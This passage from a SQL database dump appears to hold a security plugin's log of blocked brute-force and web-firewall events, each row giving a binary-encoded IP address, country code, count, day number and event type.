0\0\0\0\0\0\0\0�����','JP',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����ǎ','MA',12,18865,'waf'),('\0\0\0\0\0\0\0\0\0\0���#\r�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���#j�','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���#j�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���#y�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���#y�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���#y�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���#~f','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','NL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','NL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�\r','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���aZ','DE',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���aZ','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���aZ','DE',3,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���aZ','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�V','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�V','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�V','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���u,?','SG',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����)�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����)�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����Ù','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����Ù','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����Ù','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����5u','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����B�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����B�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����O�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����jQ','US',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����l[','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����l[','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����l[','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����l�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����r�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����vH','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����vH','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����vH','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����vH','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����vH','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����y�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����y�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����y�','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����y�','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0����zX','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����zX','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����zX','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����zX','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����zX','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���ֻ�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����0','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���ݹ\n','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','US',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����h�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�1','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�1','VN',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dc�','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dc�','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dc�','DE',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dc�','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dd@','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dd@','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dd@','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dg�','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dm','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���Do�','DE',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���Do�','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���Do�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dt','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�s','US',1,18872,'waf'),('\0\0\0\0\0\0\0\0\0\0���Z�w','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�w','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�w','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�w','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�w','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�w','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����&�','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����&�','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����&�','FR',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���T','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���T','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����A','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���ф','IN',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���ф','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���ф','IN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����7','IN',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����7','IN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0����7','IN',3,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0','IN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0','IN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����	g','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����	g','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����	g','US',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����	g','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����	g','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����Z�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����Z�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����Z�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����[�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����\'','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����\'','DE',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���㪽','DE',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0�����9','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����9','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0������','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����N','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���贮','IN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���>|�','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���>}�','US',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���>}�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���G?/','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���G?/','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���GE�','NL',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���GE�','NL',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���GY\\','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���GY\\','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Go','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gǫ','SG',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�k','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�k','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�k','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�%','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�%','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gڿ','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gڿ','SG',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gڿ','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gڿ','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�,','IN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���VE3','DE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���VE3','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���VK�','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���V{�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���c9','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���c9','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���c\rZ','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���c6','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���cN�','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���cN�','SG',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���cN�','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���c]�','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���c]�','GB',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���c]�','GB',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���cr5','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���cr5','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�X','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�X','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�X','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�X','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�X','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�','CA',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����8$','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����8$','GB',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����8$','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����8$','GB',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����o','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����� ','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���ww','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���w8*','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҝ4','AR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҝ4','AR',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���*','IR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���*','IR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����J','VN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����J','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"�','VN',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����2<','VN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���h,-','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���i��','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���i��','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���R�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���RW�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Z','US',4,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Z','US',4,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Z','US',6,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����\\','US',4,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����]','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',2,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����9�','CA',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����9�','CA',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����O','DE',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0����s','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����s','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����s','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���옔','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���쬺','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����\n','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����\n','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����\n','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����\n','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����\n','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����d','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����d','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����o','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����o','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����q','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����t','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0`','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����8\Z','DE',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����8\Z','DE',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����8\Z','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����o','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����ʰ','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����ʰ','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����ʰ','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����p�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����p�','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����p�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����p�','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����u','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����56','CA',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����56','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���kb','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���5T�','TR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���CU�','US',25,18868,'waf'),('\0\0\0\0\0\0\0\0\0\0���CU�','US',2,18868,'waf'),('\0\0\0\0\0\0\0\0\0\0���c�','RU',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���wң','GR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����؛','TR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����؛','TR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n�u','BR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���%��','BR',1,18858,'waf'),('\0\0\0\0\0\0\0\0\0\0���5�i','BR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o','BR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���7pm','BR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���7pm','BR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���7pm','BR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���7pm','BR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�a','BR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���I�-','BR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���>	z','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���>	z','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���>	z','GB',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���>!�','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L�','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L�','GB',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���>M�','GB',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���>n�','GB',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����*}','GB',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����2','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����2','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����3�','SG',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����:','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����;I','SG',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����>�','SG',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����Dy','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����L`','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����R�','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����]M','SG',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����^{','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����g','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����z','DE',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����@�','UA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����@�','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����*J','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����*J','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���� �','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���� �','DE',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���� �','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���� �','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���l��','BR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���l��','BR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���l��','BR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���M','BR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���M','BR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','ID',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','ID',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����E','ID',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����E','ID',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����E','ID',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���5#','TH',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','MO',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','MO',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0����`�','BD',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','CN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���oC�','KR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����~�','US',1,18875,'brute'),('\0\0\0\0\0\0